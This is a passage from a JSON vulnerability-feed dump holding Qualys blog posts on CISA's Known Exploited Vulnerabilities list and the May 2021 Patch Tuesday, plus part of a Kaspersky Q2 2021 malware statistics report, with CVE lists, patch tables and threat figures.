20`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149
`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization get there: Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help an organization of any size efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", 
"CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", 
"CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-14T06:32:34", "description": "### Microsoft Patch Tuesday \u2013 May 2021\n\nMicrosoft patched 55 CVEs in their May 2021 Patch Tuesday release, of which 4 are rated as critical severity. Three 0-day vulnerability patches were included in the release. As of this publication date, none have been exploited.\n\nQualys released 12 QIDs on the same day, providing vulnerability detection and patch management coverage (where applicable) for all 55 CVEs and the related KBs.\n\n#### Critical Microsoft vulnerabilities patched: \n\n**CVE-2021-31181 **- SharePoint Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE vulnerability in SharePoint (CVE-2021-31181). This CVE has a high likelihood of exploitability and is assigned a CVSSv3 base score of 8.8 by the vendor. 
\n\n**CVE-2021-31166** - HTTP Protocol Stack Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE vulnerability in Windows. This vulnerability allows an unauthenticated attacker to remotely execute code in the kernel. This is a wormable vulnerability where an attacker can simply send a specially crafted packet to a target server that uses the HTTP protocol stack (HTTP.sys). This CVE has a high likelihood of exploitability and is assigned a CVSSv3 base score of 9.8 by the vendor.\n\n**CVE-2021-28476** - Hyper-V Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE in Windows Server that impacts Hyper-V. Though the exploitation of this vulnerability is less likely (according to Microsoft), this should be prioritized for patching since adversaries can abuse this vulnerability and cause Denial of Service (DoS) in the form of a bug check. This CVE is assigned a CVSSv3 base score of 9.9 by the vendor.\n\n#### Three 0-day vulnerabilities patched: \n\n * CVE-2021-31204 - .NET and Visual Studio Elevation of Privilege Vulnerability \n * CVE-2021-31207 - Microsoft Exchange Server Security Feature Bypass Vulnerability\n * CVE-2021-31200 - Common Utilities Remote Code Execution Vulnerability\n\n#### Qualys QIDs Providing Coverage\n\nQID| Title| Severity| CVE ID \n---|---|---|--- \n100415| Microsoft Internet Explorer Security Update for May 2021| Medium| CVE-2021-26419 \n91762| Microsoft SharePoint Enterprise Server Multiple Vulnerabilities May 2021| High| CVE-2021-31181 \nCVE-2021-31173 \nCVE-2021-31172 \nCVE-2021-31171 \nCVE-2021-26418 \nCVE-2021-28478 \nCVE-2021-28474 \n110381| Microsoft Office and Microsoft Office Services and Web Apps Security Update May 2021| High| CVE-2021-31180 \nCVE-2021-31179 \nCVE-2021-31178 \nCVE-2021-31177 \nCVE-2021-31176 \nCVE-2021-31175 \nCVE-2021-31174 \nCVE-2021-28455 \n110382| Microsoft Skype for Business Server Security and Lync Server Update for May 2021| High| CVE-2021-26421 \nCVE-2021-26422 \n375556| 
Visual Studio Code Remote Code Execution Vulnerability| High| CVE-2021-31214 \nCVE-2021-31211 \n375557| Visual Studio Code Remote Development for Containers Extension Remote Code Execution Vulnerability| Medium| CVE-2021-31213 \n50111| Microsoft Exchange Server Multiple Vulnerabilities - May 2021| High| CVE-2021-31209 \nCVE-2021-31207 \nCVE-2021-31198 \nCVE-2021-31195 \n91762| Microsoft Windows Security Update for May 2021| Critical| CVE-2021-31192 \nCVE-2021-31188 \nCVE-2021-31170 \nCVE-2021-28476 \nCVE-2021-31184 \nCVE-2021-31190 \nCVE-2021-31167 \nCVE-2021-31168 \nCVE-2021-31208 \nCVE-2021-31169 \nCVE-2021-31165 \nCVE-2021-1720 \nCVE-2021-28479 \nCVE-2021-31185 \nCVE-2021-31194 \nCVE-2021-31191 \nCVE-2021-31186 \nCVE-2021-31205 \nCVE-2021-31193 \nCVE-2021-31187 \nCVE-2020-26144 \nCVE-2020-24587 \nCVE-2020-24588 \n91763| Microsoft Visual Studio Security Update for May 2021| High| CVE-2021-27068 \nCVE-2021-31204 \n91764| Microsoft Windows Web Media Extensions Remote Code Execution Vulnerability| High| CVE-2021-28465 \n91766| Microsoft .NET Core Security Update May 2021| Medium| CVE-2021-31204 \n91767| Microsoft Windows HTTP Protocol Stack Remote Code Execution Vulnerability - May 2021| Critical| CVE-2021-31166 \n \n### Adobe Patch Tuesday \u2013 May 2021\n\nAdobe addressed 46 CVEs this Patch Tuesday, of which 26 are rated as critical severity, including one critical 0-day (CVE-2021-28550) impacting Adobe Acrobat and Reader product.\n\nAdobe products patches include the following: Experience Manager, InDesign, Illustrator, InCopy, Genuine Service, Acrobat and Reader, Magento, Creative Cloud Desktop Application, Media Encoder, After Effects, Medium, and Animate products.\n\nQualys released 5 QIDs on the same day, providing vulnerability detection for 30 of the 46 CVEs, including 8 rated as critical.\n\n#### One 0-day vulnerability patched:\n\n**CVE-2021-28550**\n\nThis is a Remote Code Execution vulnerability impacting Adobe Acrobat and Reader and is being actively 
exploited in the wild on Windows devices. Adversaries are able to execute arbitrary code in windows, including installing malicious applications and gaining complete access to target machines.\n\nAdobe Security Bulletin| QID| Severity| CVE ID \n---|---|---|--- \n[APSB21-22 Security updates available for Adobe InDesign](<https://helpx.adobe.com/security/products/indesign/apsb21-22.html>)| 375549| Critical \nCritical \nCritical| CVE-2021-21098 \nCVE-2021-21099 \nCVE-2021-21043 \n[APSB21-24 Security update available for Adobe Illustrator](<https://helpx.adobe.com/security/products/illustrator/apsb21-24.html>)| 375551| Critical \nCritical \nCritical \nCritical \nCritical| CVE-2021-21101 \nCVE-2021-21103 \nCVE-2021-21104 \nCVE-2021-21105 \nCVE-2021-21102 \n[APSB21-29 Security update available for Adobe Acrobat and Reader](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>)| 375547| Important \nCritical \nImportant \nCritical \nImportant \nCritical \nCritical \nCritical \nCritical \nCritical \nImportant \nCritical \nCritical \nCritical| CVE-2021-28561 \nCVE-2021-28560 \nCVE-2021-28558 \nCVE-2021-28557 \nCVE-2021-28555 \nCVE-2021-28565 \nCVE-2021-28564 \nCVE-2021-21044 \nCVE-2021-21038 \nCVE-2021-21086 \nCVE-2021-28559 \nCVE-2021-28562 \nCVE-2021-28550 \nCVE-2021-28553 \n[APSB21-32 Security update available for Adobe Media Encoder](<https://helpx.adobe.com/security/products/media-encoder/apsb21-32.html>)| 375550| Important| CVE-2021-28569 \n[APSB21-35 Security update available for Adobe Animate7](<https://helpx.adobe.com/security/products/animate/apsb21-35.html>)| 375553| Important \nImportant \nImportant \nImportant \nImportant \nCritical \nCritical| CVE-2021-28572 \nCVE-2021-28573 \nCVE-2021-28574 \nCVE-2021-28575 \nCVE-2021-28576 \nCVE-2021-28578 \nCVE-2021-28577 \n \n### Discover Patch Tuesday Vulnerabilities in VMDR \n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) automatically detects new Patch Tuesday 
vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:(qid:`50111` OR qid:`91762` OR qid:`91763` OR qid:`91764` OR qid:`91766` OR qid:`91767` OR qid:`100415` OR qid:`110380` OR qid:`110381` OR qid:`110382` OR qid:`375547` OR qid:`375549` OR qid:`375550` OR qid:`375551` OR qid:`375553` OR qid:`375556` OR qid:`375557`)`\n\n\n\n### Respond by Patching\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday.\n\n`qid:`50111` OR qid:`91762` OR qid:`91763` OR qid:`91764` OR qid:`91766` OR qid:`91767` OR qid:`100415` OR qid:`110380` OR qid:`110381` OR qid:`110382` OR qid:`375547` OR qid:`375549` OR qid:`375550` OR qid:`375551` OR qid:`375553` OR qid:`375556` OR qid:`375557``\n\n\n\n### Patch Tuesday Dashboard \n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://qualys-secure.force.com/discussions/s/article/000006505>).\n\n### Webinar Series: This Month in Patches\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [_This Month in Patches_](<https://www.brighttalk.com/webcast/11673/486394>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * 21Nails Exim Mail Server Multiple Vulnerabilities\n * Pulse Connect Secure Remote Code Execution Vulnerability (CVE-2021-22893)\n * Microsoft Patch Tuesday, May 2021\n\n[Join us live or 
watch on demand](<https://www.brighttalk.com/webcast/11673/486394>)!\n\n### About Patch Tuesday \n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {}, "published": "2021-05-11T21:53:37", "type": "qualysblog", "title": "Microsoft & Adobe Patch Tuesday (May 2021) \u2013 Qualys covers 85 Vulnerabilities, 26 Critical", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-24587", "CVE-2020-24588", "CVE-2020-26144", "CVE-2021-1720", "CVE-2021-21038", "CVE-2021-21043", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-21098", "CVE-2021-21099", "CVE-2021-21101", "CVE-2021-21102", "CVE-2021-21103", "CVE-2021-21104", "CVE-2021-21105", "CVE-2021-22893", "CVE-2021-26418", "CVE-2021-26419", "CVE-2021-26421", "CVE-2021-26422", "CVE-2021-27068", "CVE-2021-28455", "CVE-2021-28465", "CVE-2021-28474", "CVE-2021-28476", "CVE-2021-28478", "CVE-2021-28479", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565", "CVE-2021-28569", "CVE-2021-28572", "CVE-2021-28573", "CVE-2021-28574", "CVE-2021-28575", "CVE-2021-28576", "CVE-2021-28577", "CVE-2021-28578", "CVE-2021-31165", "CVE-2021-31166", "CVE-2021-31167", "CVE-2021-31168", "CVE-2021-31169", "CVE-2021-31170", "CVE-2021-31171", "CVE-2021-31172", "CVE-2021-31173", "CVE-2021-31174", "CVE-2021-31175", "CVE-2021-31176", "CVE-2021-31177", "CVE-2021-31178", "CVE-2021-31179", "CVE-2021-31180", "CVE-2021-31181", "CVE-2021-31184", "CVE-2021-31185", "CVE-2021-31186", "CVE-2021-31187", "CVE-2021-31188", "CVE-2021-31190", "CVE-2021-31191", "CVE-2021-31192", "CVE-2021-31193", "CVE-2021-31194", "CVE-2021-31195", "CVE-2021-31198", 
"CVE-2021-31200", "CVE-2021-31204", "CVE-2021-31205", "CVE-2021-31207", "CVE-2021-31208", "CVE-2021-31209", "CVE-2021-31211", "CVE-2021-31213", "CVE-2021-31214"], "modified": "2021-05-11T21:53:37", "id": "QUALYSBLOG:A8EE36FB3E891C73934CB1C60E3B3D41", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2021-08-12T10:37:29", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2 2021:\n\n * Kaspersky solutions blocked 1,686,025,551 attacks from online resources across the globe.\n * Web antivirus recognized 675,832,360 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 119,252 unique users.\n * Ransomware attacks were defeated on the computers of 97,451 unique users.\n * Our file antivirus detected 68,294,298 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 119,252 unique users.\n\n_Number of unique users attacked by financial malware, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140610/01-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q2 2021 
([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140636/02-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 5.8 \n2 | Tajikistan | 5.0 \n3 | Afghanistan | 4.2 \n4 | Uzbekistan | 3.3 \n5 | Lithuania | 2.9 \n6 | Sudan | 2.8 \n7 | Paraguay | 2.5 \n8 | Zimbabwe | 1.6 \n9 | Costa Rica | 1.5 \n10 | Yemen | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nLast quarter, as per tradition, the most widespread family of bankers was ZeuS/Zbot (17.8%), but its share in Q2 almost halved, by 13 p.p. Second place again went to the CliptoShuffler family (9.9%), whose share also fell, by 6 p.p. The Top 3 is rounded out by SpyEye (8.8%), which added 5 p.p., climbing from the eighth place. 
Note the disappearance of Emotet from the Top 10, which was predictable given the liquidation of its infrastructure in the previous quarter.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 17.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 9.9 \n3 | SpyEye | Trojan-Spy.Win32.SpyEye | 8.8 \n4 | Trickster | Trojan.Win32.Trickster | 5.5 \n5 | RTM | Trojan-Banker.Win32.RTM | 3.8 \n6 | Danabot | Trojan-Banker.Win32.Danabot | 3.6 \n7 | Nimnul | Virus.Win32.Nimnul | 3.3 \n8 | Cridex | Backdoor.Win32.Cridex | 2.3 \n9 | Nymaim | Trojan.Win32.Nymaim | 1.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 1.6 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Attack on Colonial Pipeline and closure of DarkSide\n\nRansomware attacks on large organizations continued in Q2. Perhaps the most notable event of the quarter was the [attack by the DarkSide group on Colonial Pipeline](<https://ics-cert.kaspersky.com/reports/2021/05/21/darkchronicles-the-consequences-of-the-colonial-pipeline-attack/>), one of the largest fuel pipeline operators in the US. The incident led to fuel outages and a state of emergency in four states. The results of the investigation, which involved the FBI and several other US government agencies, was reported to US President Joe Biden.\n\nFor the cybercriminals, this sudden notoriety proved unwelcome. In their blog, DarkSide's creators heaped the blame on third-party operators. 
Another post was published stating that DarkSide's developers had lost access to part of their infrastructure and were shutting down the service and the affiliate program.\n\nAnother consequence of this high-profile incident was a new rule on the Russian-language forum XSS, where many developers of ransomware, including REvil (also known as Sodinokibi or Sodin), LockBit and Netwalker, advertise their affiliate programs. The new rule forbade the advertising and selling of any ransomware programs on the site. The administrators of other forums popular with cybercriminals took similar decisions.\n\n#### Closure of Avaddon\n\nAnother family of targeted ransomware whose owners shut up shop in Q2 is Avaddon. At the same time as announcing the shutdown, the attackers [provided](<https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/>) Bleeping Computer with the decryption keys.\n\n#### Clash with Clop\n\nUkrainian police [searched](<https://cyberpolice.gov.ua/news/kiberpolicziya-vykryla-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shyfruvalnyka-ta-nanesenni-inozemnym-kompaniyam-piv-milyarda-dolariv-zbytkiv-2402/>) and arrested members of the Clop group. Law enforcement agencies also deactivated part of the cybercriminals' infrastructure, which [did not](<https://www.bleepingcomputer.com/news/security/clop-ransomware-is-back-in-business-after-recent-arrests/>), however, stop the group's activities.\n\n#### Attacks on NAS devices\n\nIn Q2, cybercriminals stepped up their attacks on network-attached storage (NAS) devices. 
There appeared the new [Qlocker](<https://support.qnap.ru/hc/ru/articles/360021328659-\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c-Qnap-Ransomware-Qlocker>) family, which packs user files into a password-protected 7zip archive, plus our old friends [ech0raix](<https://www.qnap.com/en/security-advisory/QSA-21-18>) and [AgeLocker](<https://www.qnap.com/en-us/security-advisory/QSA-21-15>) began to gather steam.\n\n### Number of new ransomware modifications\n\nIn Q2 2021, we detected 14 new ransomware families and 3,905 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q2 2020 \u2014 Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141411/03-en-ru-es-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2021, Kaspersky products and technologies protected 97,451 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141438/04-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of ransomware attacks\n\n_Geography of attacks by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141505/05-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.85 \n2 | Ethiopia | 0.51 \n3 | China | 0.49 \n4 | Pakistan | 0.40 \n5 | Egypt | 0.38 \n6 | Indonesia | 0.36 \n7 | Afghanistan | 0.36 \n8 | Vietnam | 0.35 \n9 | Myanmar | 0.35 \n10 | Nepal | 0.33 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | 
**Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 20.66 \n2 | Stop | Trojan-Ransom.Win32.Stop | 19.70 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.10 \n4 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 6.37 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.08 \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.87 \n7 | (generic verdict) | Trojan-Ransom.Win32.Agent | 5.19 \n8 | PolyRansom/VirLock | Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom | 2.39 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 1.48 \n10 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 1.26 \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q2 2021, Kaspersky solutions detected 31,443 new modifications of miners.\n\n_Number of new miner modifications, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141534/06-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 363,516 unique users of Kaspersky products worldwide. 
